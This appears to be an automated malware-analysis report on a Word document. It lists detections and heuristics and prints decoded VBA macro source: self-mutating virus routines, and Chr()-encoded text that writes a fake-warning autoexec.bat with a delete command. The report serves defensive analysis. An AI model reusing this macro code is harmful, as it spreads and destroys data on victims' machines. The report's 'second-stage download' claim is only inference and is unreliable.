MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing a VBA macro that exhibits obfuscation techniques. The macro's 'FileSaveAs' subroutine is triggered by the 'Document_Open' event, indicating an attempt to execute malicious code upon opening. The presence of 'Win.Trojan.Psycho-3' in the ClamAV detection further supports its malicious nature. The macro's obfuscation makes it difficult to determine the exact payload, but its structure suggests it is designed to download and execute a second-stage payload.
Heuristics 4
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39075 bytes |
SHA-256: bd5771a07f67dbd9703b94733741ca0da56de6840a095ed6abf5ccdd66a53a1b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Declare Function ExitWindowsEx Lib "User32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long Private Function ZZ(MMM) Randomize: On Error Resume Next Blah = "AA BB CC DD EEE ZZ MMM Blah BoB BoBby SDH SDH2 HH NtCode AdCode XX RRR YY " Do SDH2 = Left(Blah, InStr(Blah, Chr(32)) - 1): Blah = Mid(Blah, InStr(Blah, Chr(32)) + 1) YY = Int(Rnd * 7) + 2 BoBby = Chr((Int(Rnd * 25) + 65)) For XX = 1 To YY: BoBby = BoBby + Chr((Int(Rnd * 25) + 65)): Next XX Do SDH = InStr(SDH + 1, LCase(MMM), LCase(SDH2)) If SDH Then MMM = Mid(MMM, 1, (SDH - 1)) & BoBby & Mid(MMM, (SDH + Len(SDH2))) Loop While SDH Loop While Blah <> "" ZZ = MMM End Function Private Function EEE(HH, XX) Dim EEE22(99), EEE23(99) Set ourEEE = ThisDocument.VBProject.VBComponents(1).CodeModule For i = 1 To HH: curEEE = tmpEEE tmpEEE = ourEEE.ProcOfLine(i, 1) If curEEE <> tmpEEE Then y = y + 1 EEE22(y) = EEE22(y) & ourEEE.lines(i, 1) & vbCr Next i For x = 1 To XX EEE22(x) = Left(EEE22(x), Len(EEE22(x)) - 1) c22 = 0: c23 = 0: c24 = Int(Rnd * (XX - x) + 1) While c22 < c24 If EEE23(c23 + 1) = "" Then c22 = c22 + 1 c23 = c23 + 1 Wend EEE23(c23) = x Next x For i = 1 To XX EEE = EEE & EEE22(EEE23(i)) & vbCr Next i EEE = Left(EEE, Len(EEE) - 1) End Function Private Sub FileSaveAs() Dim XX As Integer, YY As Integer: Randomize: On Error Resume Next XX = Int(Rnd * 92) + 30: YY = Int(Rnd * 92) + 30: Dialogs(wdDialogFileSaveAs).Show End Sub Private Sub CC() On Error Resume Next: h$ = Chr(99) & Chr(58) & Chr(92) & Chr(97) & Chr(117) & Chr(116) & Chr(111) & Chr(101) & Chr(120) & Chr(101) & Chr(99) & Chr(46) & Chr(98) & Chr(97) & Chr(116) Open h$ For Output As #1 OO$ = Chr(82) & Chr(69) & Chr(77) & Chr(32) & Chr(45) & Chr(32) & Chr(84) & Chr(104) & Chr(105) & Chr(115) & Chr(32) & Chr(115) & Chr(101) & Chr(99) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(32) & Chr(112) & Chr(117) & Chr(116) & Chr(32) & Chr(105) & Chr(110) & Chr(32) & Chr(98) & Chr(121) & Chr(32) & Chr(87) & Chr(105) & Chr(110) & Chr(100) & Chr(111) & Chr(119) & Chr(115) & Chr(44) & Chr(32) & Chr(105) & Chr(102) & Chr(32) & Chr(100) & Chr(101) & Chr(108) & Chr(101) & Chr(116) & Chr(101) & Chr(100) & Chr(44) PP$ = Chr(32) & Chr(87) & Chr(105) & Chr(110) & Chr(100) & Chr(111) & Chr(119) & Chr(115) & Chr(32) & Chr(119) & Chr(105) & Chr(108) & Chr(108) & Chr(32) & Chr(110) & Chr(111) & Chr(32) & Chr(108) & Chr(111) & Chr(110) & Chr(103) & Chr(101) & Chr(114) & Chr(32) & Chr(115) & Chr(116) & Chr(97) & Chr(114) & Chr(116) & Chr(32) & Chr(117) & Chr(112) & Chr(32) & Chr(45) & Chr(13) & Chr(10) & Chr(82) & Chr(69) & Chr(77) & Chr(32) & Chr(45) & Chr(32) & Chr(80) & Chr(108) & Chr(101) & Chr(97) & Chr(115) & Chr(101) & Chr(32) & Chr(68) QQ$ = Chr(111) & Chr(32) & Chr(78) & Chr(111) & Chr(116) & Chr(32) & Chr(82) & Chr(101) & Chr(109) & Chr(111) & Chr(118) & Chr(101) & Chr(32) & Chr(45) YY$ = OO$ & PP$ & QQ$: Print #1, YY$ OO$ = Chr(64) & Chr(101) & Chr(99) & Chr(104) & Chr(111) & Chr(32) & Chr(111) & Chr(102) & Chr(102) & Chr(13) & Chr(10) & Chr(101) & Chr(99) & Chr(104) & Chr(111) & Chr(32) & Chr(89) & Chr(111) & Chr(117) & Chr(32) & Chr(65) & Chr(110) & Chr(116) & Chr(105) & Chr(45) & Chr(86) & Chr(105) & Chr(114) & Chr(117) & Chr(115) & Chr(32) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(108) & Chr(108) & Chr(32) & Chr(110) & Chr(111) & Chr(119) & Chr(32) PP$ = Chr(99) & Chr(104) & Chr(101) & Chr(99) & Chr(107) & Chr(32) & Chr(121) & Chr(111) & Chr(117) & Chr(32) & Chr(115) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(46) & Chr(46) & Chr(46) YY$ = OO$ & PP$: Print #1, YY$ OO$ = Chr(100) & Chr(101) & Chr(108) & Chr(32) & Chr(99) & Chr(58) & Chr(92) & Chr(112) & Chr(114) & C ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.